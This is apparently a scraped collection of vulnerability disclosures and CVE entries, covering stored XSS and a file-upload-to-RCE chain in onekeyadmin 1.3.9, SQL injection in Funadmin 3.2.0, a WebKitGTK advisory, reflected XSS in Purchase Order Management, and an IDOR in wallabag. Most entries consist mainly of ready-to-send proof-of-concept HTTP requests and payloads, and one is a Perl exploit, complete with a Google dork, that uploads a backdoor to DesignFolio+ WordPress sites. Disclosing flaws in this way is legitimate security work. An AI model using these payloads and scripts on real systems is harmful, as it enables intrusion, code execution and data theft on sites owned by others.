onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Title parameter under the Adding Categories module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    <img src=1 onerror=alert("xss");>  
    url  
    http://192.168.3.129:8091/admin1#catalog/index

poc POST /admin1/catalog/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 334 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/catalog/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"cover":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"show":1,"type":"page","seo\_url":"test","bind\_html":"","group\_id":\[\],"links\_type":0,"links\_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo\_title":"","seo\_keywords":"","seo\_description":"","field":\[\],"theme":"template"}  
  
then you can view xss in url  
http://192.168.3.129:8091/admin1#catalog/index

CVE-2023-26950: Background category management - adding categories has a storage xss vulnerability · Issue #9 · keheying/onekeyadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/columns.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in table.php columns-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  
  
Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\table.php#columns method  
  

Get the id directly and splice it into the sql statement

Vulnerability recurrence  
sqlmap poc save as txt  
GET /databases/table/columns?id=* HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close  
python sqlmap.py -r poc.txt  
  
GET /databases/table/columns?id='+AND+GTID_SUBSET(CONCAT(0x12,(SELECT+(ELT(6415=6415,1))),user()),6415)--+qRTY HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close

CVE-2023-24780: Database management plug-in table.php columns-sql injection vulnerability · Issue #6 · funadmin/funadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Administrator module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    url  
    http://192.168.3.129:8091/admin1#admin/index

poc POST /admin1/admin/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 224 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/admin/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","cover":"","account":"test<img src=1 onerror=alert("xss");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login\_count":"","group\_id":1,"password":"aa@xxxqq.com","status":1,"create\_time":"","theme":"template"}  

then you can view xss in url  
http://192.168.3.129:8091/admin1#admin/index

CVE-2023-26953: Background administrator management - Adding an administrator has a storage xss vulnerability · Issue #8 · keheying/onekeyadmin

** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in UpThemes Theme DesignFolio Plus 1.2 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 53f6ae62878076f99718e5feb589928e83c879a9. It is recommended to apply a patch to fix this issue. The identifier VDB-221809 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

    #########################################################
    # Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability
    # Google dork: inurl:wp-content/themes/DesignFolio-Plus
    # Author: CrashBandicot
    # Date: 04.03.2015
    # Vendor HomePage: https://github.com/UpThemes/DesignFolio-Plus
    # Software Link: https://github.com/UpThemes/DesignFolio-Plus/archive/master.zip
    # tested on : MsWin32
    #########################################################
     
    Vulnerable File : upload-file.php
    <?php
    //Upload Security
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
    if( $_FILES[$upload_security] ):
            $file = $_FILES[$upload_security];
            $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
              
                    if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                            if(chmod($file,0777)):
                                echo "success"; 
                            else:
                                    echo "error".$_FILES[$upload_security]['tmp_name'];
                            endif;
                    else:
                        echo "error".$_FILES[$upload_security]['tmp_name'];
                    endif;
    endif;
    ?>
     
    Exploit
     
    #!/usr/bin/perl
     
    use Digest::MD5 qw(md5 md5_hex);
    use MIME::Base64;
    use IO::Socket;
    use LWP::UserAgent;
     
        system(($^O eq 'MSWin32') ? 'cls' : 'clear');
            print "\n\t     ! *** #  ^_^ # *** !\n\t      :p\n\n";
     
    $use = "\n\t  [!] ./$0 127.0.0.1 backdoor.php";
     
    ($target ,$file) = @ARGV;
     
    die "$use" unless $ARGV[0] && $ARGV[1];
     
    if($target =~ /http:\/\/(.*)\//){ $target = $1; }
    elsif($target =~ /http:\/\/(.*)/){ $target = $1; }
    elsif($target =~ /https:\/\/(.*)\//){ $target = $1; }
    elsif($target =~ /https:\/\/(.*)/){ $target = $1; }
     
    my $addr = inet_ntoa((gethostbyname($target))[4]);
    my $digest = md5_hex($addr);
    my $dir = encode_base64('../../../../');
     
    my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
    $pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]);
    if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; }
     
    __END__
     
     
    # File path: http://target/shell.php

CVE-2015-10087: Offensive Security’s Exploit Database Archive

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：

<img src=1 onerror=alert("xss");>  
url  
http://192.168.3.129:8091/admin1#userGroup/index  
  
poc  
POST /admin1/userGroup/save HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 114  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/userGroup/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"id":"","title":"test<img src=1 onerror=alert("xss");>","integral":0,"default":0,"status":1,"theme":"template"}  
  
then you can view xss in url  
http://192.168.3.129:8091/admin1#userGroup/index

CVE-2023-26954: Backstage member grouping - add storage xss vulnerability · Issue #11 · keheying/onekeyadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Admin Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    <img src=1 onerror=alert("xss");>  
    url  
    http://192.168.3.129:8091/admin1#adminGroup/index

\`POST /admin1/adminGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 95 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","title":"<img src=1 onerror=alert("xss");>","status":1,"role":\[\],"theme":"template"}\`  

then you can view xss in  
url:  
http://192.168.3.129:8091/admin1#adminGroup/index

CVE-2023-26955: Background role management - there is a storage xss vulnerability in adding roles · Issue #6 · keheying/onekeyadmin

A vulnerability was found in WebKit. The flaw is triggered when processing maliciously crafted web content that may lead to arbitrary code execution. Improved memory handling addresses the multiple memory corruption issues.

*   Date Reported: **October 29, 2019**
    
*   Advisory ID: **WSA-2019-0005**
    
*   CVE identifiers: CVE-2019-8625, CVE-2019-8674, CVE-2019-8707, CVE-2019-8719, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8763, CVE-2019-8768, CVE-2019-8769, CVE-2019-8771.
    

Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.

*   CVE-2019-8625
    *   Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
    *   Credit to Sergei Glazunov of Google Project Zero.
    *   Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue was addressed with improved state management.
*   CVE-2019-8674
    *   Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
    *   Credit to Sergei Glazunov of Google Project Zero.
    *   Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue was addressed with improved state management.
*   CVE-2019-8707
    *   Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
    *   Credit to an anonymous researcher working with Trend Micro’s Zero Day Initiative, cc working with Trend Micro Zero Day Initiative.
    *   Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling.
*   CVE-2019-8719
    *   Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
    *   Credit to Sergei Glazunov of Google Project Zero.
    *   Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue was addressed with improved state management.
*   CVE-2019-8720
    *   Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
    *   Credit to Wen Xu of SSLab at Georgia Tech.
    *   Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling.
*   CVE-2019-8726
    *   Versions affected: WebKitGTK before 2.24.3 and WPE WebKit before 2.24.3.
    *   Credit to Jihui Lu of Tencent KeenLab.
    *   Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling.
*   CVE-2019-8733
    *   Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
    *   Credit to Sergei Glazunov of Google Project Zero.
    *   Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling.
*   CVE-2019-8735
    *   Versions affected: WebKitGTK before 2.24.2 and WPE WebKit before 2.24.2.
    *   Credit to G. Geshev working with Trend Micro Zero Day Initiative.
    *   Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling.
*   CVE-2019-8763
    *   Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
    *   Credit to Sergei Glazunov of Google Project Zero.
    *   Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling.
*   CVE-2019-8768
    *   Versions affected: WebKitGTK before 2.24.0 and WPE WebKit before 2.24.0.
    *   Credit to Hugo S. Diaz (coldpointblue).
    *   Impact: A user may be unable to delete browsing history items. Description: “Clear History and Website Data” did not clear the history. The issue was addressed with improved data deletion.
*   CVE-2019-8769
    *   Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
    *   Credit to Piérre Reimertz (@reimertz).
    *   Impact: Visiting a maliciously crafted website may reveal browsing history. Description: An issue existed in the drawing of web page elements. The issue was addressed with improved logic.
*   CVE-2019-8771
    *   Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
    *   Credit to Eliya Stein of Confiant.
    *   Impact: Maliciously crafted web content may violate iframe sandboxing policy. Description: This issue was addressed with improved iframe sandbox enforcement.

We recommend updating to the latest stable versions of WebKitGTK and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases.

Further information about WebKitGTK and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/.

CVE-2019-8720: WebKitGTK and WPE WebKit Security Advisory WSA-2019-0005

An arbitrary file upload vulnerability in the component /admin1/config/update of onekeyadmin v1.3.9 allows attackers to execute arbitrary code via a crafted PHP file.

Vulnerability affects product:onekeyadmin  
Vulnerability affects version 1.3.9  
Vulnerability type:Remote code execution  
Vulnerability Details：  
Remote code execution caused by uploading arbitrary files in the background

Vulnerability location  
Vulnerability occurs in  
app\\admin\\controller\\File#upload Although there are restrictions on ext  
  
but we found  
The app\\admin\\controller\\Config#update method can update the limit  
  
  
Vulnerability recurrence  
Conditions Admin  
poc  
The first step is to update the configuration to allow uploading php files  
\`POST /admin1/config/update HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 398  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/config/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW\_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj\_KGa\_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt\_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG\_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3\_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs\_j-o0joMSDe7mdS\_3rTvyQ5errD\_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E\_1-zYB117H7tFTA\_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious filesPOST /admin1/file/upload HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 280  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP  
Accept: _/_  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/file/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="name"

templatex  
\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="file"; filename="1.php"  
Content-Type: text/php

\------WebKitFormBoundaryARP8fRC2kb4GP3oP--  
\`

CVE-2023-26949: Remote code execution caused by uploading arbitrary files in the background · Issue #1 · keheying/onekeyadmin

Purchase Order Management version 1.0 appears to suffer from a cross site scripting vulnerability due to printing errors with a malicious password payload.

    ## Title: Purchase Order Management-1.0 - XSS-Reflected - Information-gathering## Author: nu11secur1ty## Date: 03.06.2023## Vendor: https://www.sourcecodester.com/user/257130/activity## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `password` request parameter is copied into the HTMLdocument as plain text between tags. The payload uay4w<img src=aonerror=alert(1)>s4m6g was submitted in the password parameter. Thisinput was echoed unmodified in the application's response.STATUS: HIGH Vulnerability[+]Exploit:```POSTPOST /purchase_order/classes/Login.php?f=login HTTP/1.1Host: localhostAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5Origin: http://localhostX-Requested-With: XMLHttpRequestReferer: http://localhost/purchase_order/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected)## Proof and Exploit:[href](https://streamable.com/cgw8a4)## Time spend:00:15:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer athttps://packetstormsecurity.com/https://cve.mitre.org/index.html andhttps://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Purchase Order Management 1.0 Cross Site Scripting

Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.4.

**Description**

IDOR Vulnerability Allows add tag entry user other, allows adding tags to any user, since there is no user authentication. And not limiting the input causes the entry interface to break

**Proof of Concept**

Step 1. User A manages entry id 6

Step 2. User B manages entry id 7

Step 3. Login user A, add tag for this user entry

eg: demo user A

    POST /new-tag/6 HTTP/1.1
    Host: localhost
    Content-Length: 85
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/view/6
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
    Connection: close
    
    tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM
    

Step 4. Change the ID to 7, now you can add a tag to the user's entry

    POST /new-tag/7 HTTP/1.1
    Host: localhost
    Content-Length: 85
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/view/6
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
    Connection: close
    
    tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM
    

Step 5. Input value is not limited, then input character > 200 makes the interface broken

**Impact**

an attacker add tag by user other, interface broken

Tag

#webkit